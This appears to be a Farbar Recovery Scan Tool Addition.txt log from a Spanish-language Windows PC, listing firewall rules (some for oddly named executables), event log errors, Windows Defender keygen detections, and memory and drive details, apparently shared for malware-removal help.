(ConsentPromptBehaviorUser: 3) (EnableLUA: 1) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off) Windows Firewall is enabled. ==================== MSCONFIG/TASK MANAGER disabled items == If an entry is included in the fixlist, it will be removed. HKLM\...\StartupApproved\Run32: => "SecurityHealth" HKU\S-1-5-21-1103162910-2907697783-2557054662-1001\...\StartupApproved\Run: => "OneDrive" ==================== FirewallRules (Whitelisted) =============== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) FirewallRules: [{8F46AF96-21AC-475B-8009-42D0DE211738}] => (Allow) C:\Program Files (x86)\Common Files\Mcafee\MMSSHost\MMSSHost.exe (McAfee, Inc.) FirewallRules: [{1BD4F174-6002-4CDF-8E2C-EDD99D6CAFD5}] => (Allow) C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHost.exe (McAfee, Inc.) FirewallRules: [{873EBAF5-B491-4F32-B7DA-DB931BE06BE2}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe (McAfee, Inc.) FirewallRules: [{B6B07D60-3EAE-44B3-B58A-88E0DF51C38A}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation) FirewallRules: [{BDED2249-D485-416F-86FC-A3990EBF31E2}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe (Microsoft Corporation) FirewallRules: [{FEF8BF62-1E58-48B0-84D7-B6BB51A6D94D}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation) FirewallRules: [{B9BC4698-EFCB-4C77-A9D8-6C5591F63BF6}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe (Microsoft Corporation) FirewallRules: [{1AEA5389-DAE6-4870-AB81-91AE5C2416B8}] => (Allow) C:\Users\flipp\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) FirewallRules: [{87DBD563-1572-4033-9CA8-2D8D739FEA38}] => (Allow) C:\Users\flipp\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc.) FirewallRules: [{90C3923E-63D4-4D29-A010-5631B1C7C085}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.) FirewallRules: [{E4572BCD-C372-4AC1-A96F-E0E026C3486F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc.) FirewallRules: [{5B2534DB-2D12-466D-9200-8CF06988F2A8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc.) FirewallRules: [{487DAD7F-7557-4109-A0F8-5C9EEB676F36}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc.) FirewallRules: [{22887534-B78D-4692-9A24-B70E5ADFA6F4}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc.) FirewallRules: [{A682D961-C24F-436A-AC92-4F934CFDE29A}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Syncios Data Transfer) FirewallRules: [{5244645C-AF55-4068-8718-491545A9790C}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) FirewallRules: [{3165F10F-5D65-4726-8C4A-6D62718AEADF}] => (Allow) C:\Windows\SysWOW64\msiexec.exe (Microsoft Corporation) FirewallRules: [{C6CAFD2B-28D2-4F66-BC0B-D15E7B1C6BEB}] => (Allow) C:\Windows\SysWOW64\NNbIJUy.exe (Microsoft Corporation) FirewallRules: [{C4DAE771-4998-4897-BCF4-ACA7240C4AEF}] => (Allow) C:\Windows\EyIz.exe (Microsoft Corporation) FirewallRules: [{AA15F3B4-89A9-42AB-9F78-75AD53CA8893}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{7A565219-7428-40B4-B8D7-D10291673C9E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{81516910-F2CA-46D5-9F3C-35ACA08A6B54}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{9588838F-C213-40F9-BDA0-32CD22F3C152}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{AAFEE8A0-9DE0-4B3A-BB0E-2625C2FB52A1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{5C66D66A-0384-4157-AC86-931AF59CD85A}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{2C5C9A69-C6F3-4001-B3D3-FC1A58A07230}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{BF490E95-D01B-4C85-B6F7-8245E695729E}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{DEF6E960-C88E-4486-B2D0-8FEE8EACFD29}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{109C42F4-F2E2-4CD9-A0A8-102E54E1F787}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{9CAD31AB-B272-448E-92A7-D7F9C891073F}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{7EF212BF-3A21-495E-B6FD-62F7CE8715EF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{DF228F9E-A37D-4795-859E-1525A6C58B33}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{726CC30B-6FF4-4B98-87F8-0C3929EE2E2D}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{D61CD1E8-7CBD-4466-B6CC-CFB090A603A9}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{8BC88B2C-DF35-43DA-AA94-044A2D3C5840}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{DC91FF5E-1ED4-4178-8C93-13BC2D460185}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{C5D1CDE1-AB48-4830-9B27-46C20B0F54A4}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{A339E6CF-3B90-4E41-B586-F4F1833F0DFD}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{845B275E-F3F7-4CAB-8DCF-856C858ECA6B}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{2990E327-D13B-4F54-9766-C24B9411FF03}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{3AB5166C-70D0-4E7A-BD3D-F8BF560616FA}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{BF707289-2388-408D-AA5A-55F16B436104}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{A6D14054-D649-464D-8F0E-D77AF2DD7A10}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{D698664D-B605-4BAA-A0FC-693B4DA986EE}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{FD65BC3C-8C8D-4C22-9D99-612250B4D9CB}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{C07BE0B5-6443-47D3-BB5A-0BC0E3B03A64}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{954AB7A2-BC34-4F3C-8F99-EB0AD347B834}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{6AA8D199-6D3D-408E-BC06-CA2FE108BE81}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{7EFFC5B6-EE07-44A9-8D02-6284B2428E33}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{DDAB8BF1-DB86-444F-91D2-68485565AE07}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) FirewallRules: [{BD54E6B9-6731-42FF-B99C-E27A14749B47}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) FirewallRules: [{A9B653FB-5FC7-4275-AE4C-1FE50CE2DB95}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{FCF4C5DC-3831-4647-B1A1-8F295DC55187}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{11218C9B-F1DD-4200-B32B-672400D8DC1C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{94ADFD97-9479-4FE6-B7E2-959CE40FF5E0}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{82275CE6-8FB5-4DD1-B5C3-F22D8B8D7700}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{231E83A8-9196-4646-B5D7-FEF1FEC8549F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{F9EC0660-7207-44D1-BEB6-64DCBFA678CF}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{6D38D712-C6B0-4A11-A7B1-E4FF03E6EFC9}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{8DBF6A71-A60F-4D2A-A614-45A741DDDD78}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{670A2BCC-F551-4947-9074-668CA77B5163}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{F31EB53F-9B31-43A6-84E4-14E7CE6F1FA4}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{A3D29665-7B2E-411F-A1A0-24B01A1A3278}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{B9639ABD-B289-4D42-973A-A4A15D5F8ECD}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{0B401F7B-B768-412E-AF7F-612ED35DB550}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{9715FD71-D8E4-44DC-80B8-BDF3A72C5C53}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{34F61057-4CA5-4E7A-A9D0-7EB243100E2B}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{62BA119C-A0DD-481A-AC0E-98A0F3B5A764}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{4997D30E-D6DB-4694-A562-49C87F2B7FCC}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{24C35466-DE90-4E5F-A04A-48D61214759D}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd) FirewallRules: [{60283A9C-621E-4324-90A0-F917C6EF6D86}] => (Allow) C:\Program Files\CCleaner\CCUpdate.exe (Piriform Ltd) FirewallRules: [{BE941A73-FDC4-4851-9E36-F06A35B92054}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{416BC277-EAE3-45A8-848F-BF76745353CC}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{81A1FE19-3607-4781-8C33-04CD799A9DE8}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{BBB9E90C-D91C-47CA-A850-EC43C44464B1}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{01F20083-42B1-45FD-8025-2B519E8FB5B2}] => (Allow) C:\Windows\SysWOW64\svchost.exe (Microsoft Corporation) FirewallRules: [{C4984B45-C90C-4EF3-B702-7B9A364E3490}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe (InstallShield Software Corporation) FirewallRules: [{EA780E91-CEB3-4CAA-940A-2FA41F32CE64}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc.) ==================== Restore Points ========================= 09-01-2019 12:57:33 Windows Update 16-01-2019 20:58:47 Windows Update 23-01-2019 21:25:29 Punto de control programado 30-01-2019 22:31:35 Windows Update ==================== Faulty Device Manager Devices ============= ==================== Event log errors: ========================= Application errors: ================== Error: (01/31/2019 12:08:05 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: Local Hostname DESKTOP-95LCTQ8.local already in use; will try DESKTOP-95LCTQ8-2.local instead Error: (01/31/2019 12:08:05 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: ProbeCount 0; will deregister 4 DESKTOP-95LCTQ8.local. Addr 192.168.0.4 Error: (01/31/2019 12:08:05 PM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 192.168.0.4:5353 16 DESKTOP-95LCTQ8.local. AAAA 2806:0261:040D:90CF:0521:0033:E1DD:B459 Error: (01/31/2019 09:54:55 AM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nombre de la aplicación con errores: localNETService.exe, versión: 1.3.29.1, marca de tiempo: 0x5c00b61d Nombre del módulo con errores: WS2_32.dll, versión: 10.0.17134.1, marca de tiempo: 0x9898b9e1 Código de excepción: 0xc0000005 Desplazamiento de errores: 0x0001c117 Identificador del proceso con errores: 0xe6c Hora de inicio de la aplicación con errores: 0x01d4b97cfc17d2c0 Ruta de acceso de la aplicación con errores: C:\ProgramData\localNETService\localNETService.exe Ruta de acceso del módulo con errores: C:\Windows\System32\WS2_32.dll Identificador del informe: 21317bb6-6f9d-40cd-844b-5df095df7dcf Nombre completo del paquete con errores: Identificador de aplicación relativa del paquete con errores: Error: (01/30/2019 11:42:24 PM) (Source: MsiInstaller) (EventID: 11335) (User: DESKTOP-95LCTQ8) Description: Продукт: Microsoft.NET -- Ошибка 1335. Невозможно использовать необходимый для данной установки CAB-файл "Microsoft.NET.cab", поскольку он поврежден. Возможна ошибка сети, ошибка чтения с компакт-диска или ошибка пакета установки. Error: (01/30/2019 09:41:39 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Unexpected conflict discarding 25 1.0.0.127.in-addr.arpa. PTR DESKTOP-95LCTQ8-2.local. Error: (01/30/2019 09:41:39 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Received from 127.0.0.1:5353 23 1.0.0.127.in-addr.arpa. PTR DESKTOP-95LCTQ8.local. Error: (01/30/2019 09:41:39 AM) (Source: Bonjour Service) (EventID: 100) (User: ) Description: mDNSCoreReceiveResponse: Unexpected conflict discarding 25 9.5.4.B.D.D.1.E.3.3.0.0.1.2.5.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.E.F.ip6.arpa. PTR DESKTOP-95LCTQ8-2.local. System errors: ============= Error: (01/31/2019 12:19:19 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 12:08:19 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} y APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 12:08:19 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} y APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 12:07:05 PM) (Source: DCOM) (EventID: 10010) (User: DESKTOP-95LCTQ8) Description: El servidor {4AA0A5C4-1B9B-4F2E-99D7-99C6AEC83474} no se registró con DCOM dentro del tiempo de espera requerido. Error: (01/31/2019 10:47:19 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 10:03:11 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 09:58:36 AM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY) Description: La configuración de permisos específico de la aplicación no concede el permiso Activación Local para la aplicación de servidor COM con CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} y APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} al usuario NT AUTHORITY\SERVICIO LOCAL con SID (S-1-5-19) en la dirección LocalHost (con LRPC) que se ejecuta en el contenedor de aplicaciones con SID No disponible (No disponible). Este permiso de seguridad se puede modificar mediante la herramienta administrativa Servicios de componentes. Error: (01/31/2019 09:55:00 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: El servicio localNETService se terminó de manera inesperada. Esto ha sucedido 1 veces. Windows Defender: =================================== Date: 2018-08-18 11:26:00.131 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa1152.5132\WinRAR.v4.11_KEYGEN-FFF.exe; file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa7880.13126\WinRAR.v4.11_KEYGEN-FFF.exe; file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa8468.37683\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\CCleaner\CCleaner64.exe Versión de firma: AV: 1.273.1622.0, AS: 1.273.1622.0, NIS: 1.273.1622.0 Versión de motor: AM: 1.1.15100.1, NIS: 1.1.15100.1 Date: 2018-08-18 11:25:59.717 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa1152.5132\WinRAR.v4.11_KEYGEN-FFF.exe; file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa7880.13126\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\CCleaner\CCleaner64.exe Versión de firma: AV: 1.273.1622.0, AS: 1.273.1622.0, NIS: 1.273.1622.0 Versión de motor: AM: 1.1.15100.1, NIS: 1.1.15100.1 Date: 2018-08-18 11:25:59.433 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa1152.5132\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\CCleaner\CCleaner64.exe Versión de firma: AV: 1.273.1622.0, AS: 1.273.1622.0, NIS: 1.273.1622.0 Versión de motor: AM: 1.1.15100.1, NIS: 1.1.15100.1 Date: 2018-08-16 14:30:46.717 Description: Antivirus de Windows Defender detectó malware u otro software potencialmente no deseado. Para obtener más información consulte lo siguiente: https://go.microsoft.com/fwlink/?linkid=37020&name=PUA:Win32/Keygen&threatid=225063&enterprise=0 Nombre: PUA:Win32/Keygen Id.: 225063 Gravedad: Grave Categoría: Software potencialmente no deseado Ruta de acceso: file:_C:\Users\flipp\AppData\Local\Temp\Rar$EXa6828.2006\WinRAR.v4.11_KEYGEN-FFF.exe Origen de detección: Equipo local Tipo de detección: Concreto Fuente de detección: Protección en tiempo real Usuario: DESKTOP-95LCTQ8\flipp Nombre de proceso: C:\Program Files\WinRAR\WinRAR.exe Versión de firma: AV: 1.263.48.0, AS: 1.263.48.0, NIS: 1.263.48.0 Versión de motor: AM: 1.1.14600.4, NIS: 1.1.14600.4 CodeIntegrity: =================================== Date: 2019-01-31 13:17:00.568 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:17:00.564 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:48.604 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:48.572 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:47.034 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:47.020 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:47.008 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2019-01-31 13:16:46.999 Description: Code Integrity determined that a process (\Device\HarddiskVolume5\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume5\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i3-4005U CPU @ 1.70GHz Percentage of memory in use: 25% Total physical RAM: 12203.99 MB Available physical RAM: 9040.23 MB Total Virtual: 14059.99 MB Available Virtual: 11013.55 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:211 GB) (Free:141.71 GB) NTFS Drive d: (Personal) (Fixed) (Total:166.02 GB) (Free:144.63 GB) NTFS Drive e: (Escuela) (Fixed) (Total:80.1 GB) (Free:79.76 GB) NTFS \\?\Volume{a24d1472-b6fc-4064-ba61-e8bcddbb4d17}\ (WINRETOOLS) (Fixed) (Total:0.73 GB) (Free:0.43 GB) NTFS \\?\Volume{b361e1c9-f876-453a-a999-075e9e6ee981}\ () (Fixed) (Total:7.26 GB) (Free:6.22 GB) NTFS \\?\Volume{ca8e9477-2a86-4e57-ab2c-1313b1d1c4ed}\ (ESP) (Fixed) (Total:0.48 GB) (Free:0.43 GB) FAT32 ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (Size: 465.8 GB) (Disk ID: 2FA6C01E) Partition: GPT. ==================== End of Addition.txt ============================